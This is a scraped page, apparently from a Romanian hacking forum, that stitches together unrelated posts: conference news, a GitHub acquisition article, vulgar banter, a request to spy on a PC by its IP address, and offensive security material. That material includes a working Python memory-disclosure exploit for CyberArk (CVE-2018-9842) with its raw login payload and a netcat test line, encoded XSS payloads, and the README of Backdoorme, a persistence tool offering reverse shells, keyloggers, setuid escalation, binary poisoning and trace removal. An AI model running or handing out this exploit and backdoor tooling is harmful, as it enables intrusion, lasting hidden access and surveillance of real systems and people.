Leaderboard

Se pare ca s-au deschis inregistrarile pentru Defcamp 2018: https://def.camp/tickets/ De asemenea, va puteti inscrie la Call for Papers, daca doriti sa prezentati. https://def.camp/call-for-papers/ Daca sunt intrebari, va poate ajuta @Andrei

Cui ii pasa de el... Ia zi-ne, tonomatul de cafea e bine?

tex a fost ucis in germania, au confirmat si cei de la MAE. l-au taiat niste imigranti pt un tonomat de cafea. RIP!

Here's the biggest news of the week—Microsoft has reportedly acquired GitHub for $7.5 billion. For those unaware, GitHub is a popular code repository hosting service that allows developers to host their projects, documentation, and code in the cloud using the popular Git source management system, invented in 2005 by Linux founder Linus Torvalds. GitHub is used by many developers and big tech companies including Apple, Amazon, Google, Facebook, and IBM to store their corporate code and privately collaborate on software, but Microsoft is one of the top contributors to the web-hosting service. Microsoft has uploaded several of its most important projects, including PowerShell, the .NET framework, and the Microsoft Edge JavaScript engine, to the website under open source licenses. Microsoft also partnered with Canonical to bring Ubuntu to Windows 10. Citing sources familiar with the matter, Bloomberg reports that GitHub opted to sell to Microsoft in part because it was impressed with the performance and leadership of Microsoft's CEO Satya Nadella, who has pushed the company to embrace open source technology. In a blog post published today, Microsoft has confirmed that will acquire GitHub for $7.5 billion in Microsoft stock, and the deal is expected to close by the end of 2018. "GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device." "Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub's current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives." GitHub was last valued at $2 billion in 2015. However, the decision has brought fear among some developers at open source community, with some Twitter users proclaiming the death of GitHub and open source software, and many considering to switch to rival services such as BitBucket or GitLab. The concern is completely rational and understandable. Despite the company's lack of a CEO and money woes, Github holds a privileged position in the software development ecosystem and plays a critical role. GitHub is, no doubt, a hub of the open source world, with 80 million code repositories hosted on the site as of March 2018. Microsoft, on the other hand, has once opposed to such open-source software development, with its ex-CEO Steve Ballmer describing Linux as "cancer." However, Nadella moved the company away from complete dependence on its Windows OS to more in-house development on Linux. Microsoft even brought Linux to Windows, via the Windows Subsystem for Linux. Microsoft's largest acquisition to date was LinkedIn, the job-oriented professional social network it acquired in 2015 for $26 billion, and many people are now concerned that the massive investment in LinkedIn will start to pay off for Microsoft. With both LinkedIn and GitHub, Microsoft is in a position to expand and strengthen LinkedIn. Also, the acquisition will give Microsoft access to a wealth of data and millions of software developers. https://thehackernews.com/2018/06/microsoft-acquires-github.html

Oamenii legii spun ca atacatorul ar avea antecedente, fiind inspirat de serialul Breaking Bad -

CyberArk versions prior to 10 suffer from a memory disclosure vulnerability. # Exploit Title: CyberArk < 10 - Memory Disclosure # Date: 2018-06-04 # Exploit Author: Thomas Zuk # Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ # Version: < 9.7 and < 10 # Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10 # CVE: CVE-2018-9842 # Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd # paste the following bytes into a hexedited file named logon.bin: #fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000 #!/usr/bin/python import socket import os import sys ip = "10.107.32.21" port = 1858 # Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services. # The below is a sample login request that is needed to receive the memory pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00" for iteration in range(0, 110): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(pacli_logon) # recieve response s.recv(200) reply = s.recv(1500) # write responses to file file = open("cyberark_memory", "a") file.write("received: \n") file.write(reply) file.write("\n\n\n") file.close() s.close() Source

Îți trebuie voință și chef să-ți pui osul la treabă pentru a invăța ceva, ce pula mea aștepți? Confirmarea unor utilizator din mediul public dacă să te apuci și cum să te apuci? dacă vrei să te apuci te informezi singur de ceea ce-ți treabă și începi dacă nu, o continui cu întrebări d'astea și o să mai vină și alții să-ți bage ciolanu în zeamă.

Unu dintre atacatori.

Burp Bounty is a extension of Burp Suite that improve an active and passive scanner by yourself. This extension requires Burp Suite Pro. Burp Bounty v1.0 This extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive. Usage: 1. Config section Profile Manager: you can manage the profiles, enable, disable o remove any of them. Select Profile: you can choose any profile, for modify it and save. Profiles reload: you can reload the profiles directory, for example, when you add new external profile to directory. Profile Directory: you choose the profiles directory path. 2. Payloads You can add many payloads as you want. Each payload of this secction will be sent at each entry point (Insertion points provided by the burp api) You can choos multiple Enocders. For example, if you want encode the string alert(1), many times (in descendent order): Plain text: alert(1) HTML-encode all characters: &#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29; URL-encode all characters: %26%23%78%36%31%3b%26%23%78%36%63%3b%26%23%78%36%35%3b%26%23%78%37%32%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%31%3b%26%23%78%32%39%3b Base64-encode: JTI2JTIzJTc4JTM2JTMxJTNiJTI2JTIzJTc4JTM2JTYzJTNiJTI2JTIzJTc4JTM2JTM1JTNiJTI2JTIzJTc4JTM3JTMyJTNiJTI2JTIzJTc4JTM3JTM0JTNiJTI2JTIzJTc4JTMyJTM4JTNiJTI2JTIzJTc4JTMzJTMxJTNiJTI2JTIzJTc4JTMyJTM5JTNi If you choose "URL-Encode these characters" option, you can put all characters that you want encode with URL. 3. Grep - Math For each payload response, each string, regex or payload (depending of you choose) will be searched with the specific Grep Options. Grep Type: Simple String: search for a simple string or strings Regex: search for regular expression Payload: search for payloads sended Payload without encode: if you encode the payload, and you want find for original payload, you should choose this Grep Options: Negative match: if you want find if string, regex or payload is not present in response Case sensitive: Only match if case sensitive Not in cookie: if you want find if any cookie attribute is not present Content type: you can specify one or multiple (separated by comma) content type to search the string, regex or payload. For example: text/plain, text/html, ... Response Code: you can specify one or multiple (separated by coma) HTTP response code to find string, regex or payload. For example. 300, 302, 400, ... 4. Write an Issue In this section you can specify the issue that will be show if the condition match with the options specified. Issue Name Severity Confidence And others details like description, background, etc. Examples: So, the vulnerabilities identified so far, from which you can make personalized improvements are: 1. Active scan XSS reflected and Stored SQL Injection error based XXE Command injection Open Redirect Local File Inclusion Remote File Inclusion Path Traversal LDAP Injection ORM Injection XML Injection SSI Injection XPath Injection etc 2. Passive scan Security Headers Cookies attributes Software versions Error strings In general any string or regular expression. Videos YouTube Channel Improvements for version 2.0: Add the burpcollaborator, to find blind vulnerabilities Follow redirects and how many to follow Processing cookies in redirect Regular expression in content type Response codes to avoid Content type to avoid Search only in HTTP Headers Exclude HTTP headers from the search Add option to insert new headers in the requests. Download: BurpBounty-master.zip Source

momentan nu au dat comunicat nici de tonomat. era unu bun adus din ro, omu era cu cafeaua..... era de marca cica....

sa-mi saracesti coaiele, eu m-am apucat la 9 ani si deja la 15 ani eu stiam destul de ok (zic eu) programare. nu mai zi tu pe pula mea, te rezumi intr-un mod subiectiv la tine.

Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained. Please only use Backdoorme with explicit permission - please don't hack without asking. Usage Backdoorme is split into two parts: backdoors and modules. Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety. Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence. Demonstration: Setup To start backdoorme, first ensure that you have the required dependencies. For Python 3.5+: $ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/ $ virtualenv --python=python3.5 env $ source env/bin/activate (env) $ pip install -r requirements.txt For Python 2.7: $ sudo python dependencies.py Getting Started Launching backdoorme: $ python master.py To add a target: >> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >> Backdoors To use a backdoor, simply run the "use" keyword. >> use shell/metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >> From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword. (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False ... (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ... As in metasploit, backdoors are organized by category. Auxiliary keylogger - Adds a keylogger to the system and gives the option to email results back to you. simplehttp - installs python's SimpleHTTP server on the client. user - adds a new user to the target. web - installs an Apache Server on the client. Escalation setuid - the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unpriviledged user and still be able to run nano (or any chosen binary) as root. ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor. shell - the shell backdoor is a priviledge escalation backdoor, similar to (but more specific than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unpriviledged user, simply run ".bash -p", and you will have root access. Shell bash - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash. bash2 - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side. sh - Similar to the first bash backdoor, but redirects input to /bin/sh. sh2 - Similar to the second bash backdoor, but redirects input to /bin/sh. metasploit - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell. java - creates a socket connection using libraries from Java and compiles the backdoor on the target. ruby - uses ruby's libraries to create a connection, then redirects to /bin/bash. netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell. netcat_traditional - utilizes netcat-traditional's -e option to create a reverse shell. perl - a script written in perl which redirects output to bash, and renames the process to look less conspicuous. php - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module python - uses a short python script to perform commands and send output back to the user. web - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor. Access remove_ssh - removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces. ssh_key - creates RSA key and copies to target for a passwordless ssh connection. ssh_port - Adds a new port for ssh. Windows windows - Uses msfvenom to create a windows backdoor. Modules Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword. (msf) >> add poison + Poison module added Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options. (msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False Currently enabled modules include: Poison Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor. For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently. Cron Adds an existing backdoor to the root user's crontab to run with a given frequency. Web Sets up a web server and places a web page which triggers the backdoor. Simply visit the site with your listener open and the backdoor will begin. User Adds a new user to the target. Startup Allows for backdoors to be spawned with the bashrc and init files. Whitelist Whitelists an IP so that only that IP can connect to the backdoor. Targets Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available. Contributing Backdoorme is still very much in its infancy! Feel free to contribute to the project - simply fork it, make your changes, and issue a pull request. Have an idea for a killer backdoor, or something we could improve? Make an issue and we'll add it ASAP! Please email us at backdoormegit@gmail.com with any questions. If you wish to add your own backdoor, follow the directions given in the backdoorme/backdoors/template.py file. If you wish to add your own module, follow the directions given in the backdoorme/modules/template.py file. Cheat Sheet for developers: Execute command on system: self.core.curtarget.ssh.exec_command("command") Retrieve an option: self.get_value("option") Execute command on system with root: self.target.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S command") Source: https://github.com/Kkevsterrr/backdoorme

https://www.gloryholefoundation.com/

Salut! Cum pot afla unde se afla axact un pc daca ii stiu ip-ul? Si cum as putea vedea ce face el in acel moment pe pc?